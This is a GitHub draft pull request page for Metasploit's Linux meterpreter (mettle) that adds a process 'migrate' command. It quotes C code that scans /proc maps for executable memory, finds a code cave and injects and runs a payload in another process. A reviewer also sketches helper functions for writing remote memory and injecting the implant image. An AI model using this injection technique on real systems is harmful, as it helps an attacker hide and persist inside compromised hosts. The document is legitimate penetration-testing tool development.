Skip to content

[WIP] Migrate command for Linux meterpreter #287

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Draft
msutovsky-r7 wants to merge 2 commits into
base: master
Choose a base branch
from
Draft

[WIP] Migrate command for Linux meterpreter #287

msutovsky-r7 wants to merge 2 commits into from
+379 −0

Conversation

@msutovsky-r7
Copy link
Contributor

@msutovsky-r7 msutovsky-r7 commented Oct 23, 2025

No description provided.

@dledda-r7 dledda-r7 self-assigned this Nov 6, 2025
dledda-r7
dledda-r7 reviewed Nov 6, 2025
View reviewed changes
mettle/src/base_inject.c Outdated
Comment on lines 77 to 114
strcpy(maps_file_path, "/proc/");

strcat(maps_file_path, itoa(pid, 10));
strcat(maps_file_path, "/maps");

maps_handler = fopen(maps_file_path, "r");

char * permissions;
long start_address;
long end_address;

while(getline(&line,&len, maps_handler) != -1)
{
printf("%s\n", line);
permissions = get_permissions_from_line(line);

char * permission = permissions;
while(*permission != 0)
{
char permission_char = *permission;
if(permission_char == 0x78)
break;
permission++;
}

if(*permission == 0)
continue;

start_address = get_start_address_from_maps_line(line);
end_address = get_end_address_from_maps_line(line);

long code_cave_address = find_codecave(pid,start_address, end_address, 0x100);
if(code_cave_address){
printf("Found code cave at: %lx\n", code_cave_address);
// try to inject
copy_and_run_payload(pid, code_cave_address,payload,12);
break;
}
Copy link
Contributor

@dledda-r7 dledda-r7 Nov 6, 2025
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I woul split this function and the copye and run payload in:

int write_process_memory(pid, remote_address, local_address, size)

and remote_call(pid, remote_address)

also i think the section lookup for executable memory maps should be directly in the find codecave so you have a transparent api that just get you the address of what you need

also you can create something like:
int remote_memory_allocate(int process_pid, int mem_size)

that will be something like

int remote_memory_allocate(int process_pid, int memory_size) {
    int allocated_mem = get_code_cave(memory_size);
    if(allocated_mem > 0) {
         return allocated_mem;
    }
    int wrapper_memory_size = memory_size; // possible compiler issue that's why we wrap it.
    memcpy(mmap_stub + offset_size_memory, &memory_size, sizeof(int));
    int code_cave_addr = get_code_cave(mmap_stub_size);
    write_process_memory(process_pid, code_cave_addr, mmap_stub, mmap_stub_size);
    remote_call(process_pid, code_cave_addr);
    return get_code_cave(memory_size);
}

then the migrate can look like

int migrate(int pid) {
     int migrate_stub_addr = remote_memory_alloc(pid, migrate_stub_size);
     int mettle_addr = remote_memory_alloc(pid, mettle_binimage_size);
     write_process_memory(pid, mettle_addr, mettle_binimage, mettle_binimage_size);
     memcpy(migrate_stub + offset_mettle_addr, &mettle_addr, sizeof(void *));
     wirte_process_memory(pid, migrate_stub_addr, migrate_context, migrate_stub_size);
     remote_call(pid, migrate_stub_addr);
}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@dledda-r7 dledda-r7 dledda-r7 left review comments

Assignees

@dledda-r7 dledda-r7

Labels

None yet

Projects

Metasploit Kanban
Status: Todo

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@msutovsky-r7 @dledda-r7